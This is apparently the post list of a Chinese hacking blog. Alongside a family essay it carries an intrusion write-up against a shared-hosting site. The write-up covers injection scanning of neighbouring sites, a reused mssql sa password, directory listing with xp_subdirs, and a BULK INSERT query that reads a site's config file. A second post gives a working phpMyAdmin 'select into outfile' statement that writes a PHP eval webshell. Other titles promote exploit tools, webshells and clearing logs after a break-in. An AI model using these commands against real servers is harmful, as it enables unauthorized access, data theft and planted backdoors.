做友情链接的朋友看一看(置顶)
作者:admin 日期:2008-12-28
access导出webshell语句(iis6默认设置测试可行)
作者:admin 日期:2010-07-26
我们能拥有孩子多久?
作者:admin 日期:2010-07-04
6岁,她上小学了,孩子终于走进校门,这是多么值得纪念的事情,孩子的人生从此翻开了新的篇章,却没想到,这也是孩子离开我们的第一步。她已经对与你分开一天习以为常了,而且她喜欢每天去学校,这是她更喜欢的生活。甚至,她有时还会说:妈妈,在家好无聊,没有小朋友和我玩。
12岁,她上初中了,甚至有的开始上寄宿学校,一个月或者几个月回一次家,见上一次面。他们开始不再依赖你,甚至,他们喜欢和你对着干。你想帮他们做点事情,他们说:妈妈,我自己来吧或者妈妈不要你陪了。突然觉得这句话让我们觉得好失落,孩子是不是不再需要我们了?
18岁,她离开你去上大学,一年回来两次。回来的好几天前,家里的冰箱就装不下了,为她准备了各种各样她喜欢吃的东西。可是一回来打个照面,她就忙着和同学朋友聚会去了。从此,你最怕听到的一句话是:妈妈,我不回家吃饭了,你们自己吃吧。
Tags: 亲情
记一次小小的入侵过程
作者:admin 日期:2010-07-01
BY:814ckhum0r
Site:www.hack41.cn
Team:B.H.S.T
转载请保留此段文字,牛牛就飘过吧.
近日帮朋友搞一个小站,本来以为很快就能搞定 结果花了不少时间。不得不说能力有限呀。
目标站点是老Y文章管理系统v2.5的。在网上找了下,目前基本上没有什么可直接利用的漏洞,于是开始旁注
上http://ip.468w.cn/ 查了下。服务器上150个站,用super injection导入全部站点后批量扫描注入点,很快拿到了服务器一个asp的shell,可是权限很低.几分钟过后又拿到同服另外的一个.net站的shell,初步看了下,星外的虚拟主机,设置得比较安全,除了当前站点目录和c:\windows\temp可写入,找了许久都没找到一个即可写也可执行的目录。这样信息获取的就比较少了,所幸在注册表里HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFREEADMIN\11找到了星外虚拟主机配置信息 mssql sa密码 (32位md5加密,感谢sht同学帮我查询收费记录)
,速度连接上去,
却没看到诸如freehost之类的数据库,sa被降权了,mysql 的root密码也是一样的可惜也被降权了,都是独立帐户启动的数据库.mssql backupdata时除了temp目录可写,其它目录都不能写,xp_cmdshell,xp_dirtree,xp_oacreate,等那些存储过程都不可用,上传相关dll文件尝试恢复提示拒绝访问,不过还可以用xp_subdirs列出d:\freehost的所有子目录来。但是目标web路径没有用域名这类的作为名称,花了大半天的时间才找到目标站的路径。大致方法就是通过whois查到管理员的qq邮箱,再通过搜索qq,找到管理员常用用户名xxx336,再在列出的子目录里找到一个xxx336的目录,exec master..xp_subdirs ‘d:\freehost\xxxx336\web’ 的确老y文章管理系统的目录结构不过后台目录被改了这下也暴露出来了,目前知道后台地址,web目录。Qq,常用用户名,把这些整理成一字典 进行后台密码和ftp穷举,也失败了。于是想打数据库的主意,老Y文章管理系统的配置文件为/inc/config.asp,的参数中有数据库路径,于是在网上相关 mssql读取文件内容的方法,总算是找到了,也许牛牛们早就知道了,但我还是第一次用到,拿出来分享下希望对没有接触过的同学有帮助以免走弯路,
用查询分析器执行如下语句
Use xxx120;--(这里是随便选的一个数据库)
drop table cmd;
create table cmd (a text);
BULK Insert cmd
FROM 'd:\freehost\xxx336\web\inc\config.asp'
WITH (
FIELDTERMINATOR = '\n',
ROWTERMINATOR = '\n\n'
)
select * from cmd
这样就成功读出了d:\freehost\xxx336\web\inc\config.asp文件的内容,很惊讶。 
下载数据库后找到管理员表,密码字符串只有14位,下载了套程序看了下相关代码Mid(md5(Admin_Pass,32),4,18),先经过32位md5密码然后从4位开始往后取18位 。密码不可逆,看到这个就蛋疼了。看了看后台验证文件admin_check.asp, 很鸡肋cookies欺骗。利用起来很麻烦。于是在下载到的数据库的普通用户表中查询和管理员表的里密码相似的用户,结果还真找到了个用户, 
linux敏感文件
作者:admin 日期:2010-04-08
Linux系统的LOG日志文件及入侵后日志的清除
作者:admin 日期:2010-03-31
!!!!!
作者:admin 日期:2010-03-19
百度。。。。
作者:admin 日期:2010-01-12
I am still aliving
作者:admin 日期:2009-11-26
putty for s60 v3(已签名)
作者:admin 日期:2009-09-28
php168最新漏洞利用工具(login.php)
作者:admin 日期:2009-09-16
asp中调用fso设置文件属性
作者:admin 日期:2009-09-02
本博pr 又恢复3了。。。。
作者:admin 日期:2009-08-14
blog安新家了
作者:admin 日期:2009-07-30
aspxspy2.0
作者:admin 日期:2009-07-23
一次曲折入侵拿源代码过程
作者:admin 日期:2009-07-12
select into outfile导出webshell技巧
作者:admin 日期:2009-07-09
在网上看到的都是先建立一个表。然后插入一句话木马。再查询并导出,经过我实验 其实不用建表 就可以导出文件的
比如我们进入了phpmyadmin,随便点击一个数据库,然后点击sql,接着执行select 0x3c3f706870206576616c28245f524551554553545b636d645d293b3f3e into outfile 'd:/xamp/www/ok.php'即可将一句话<?php eval($_REQUEST[cmd]);?>导出得到webshell.
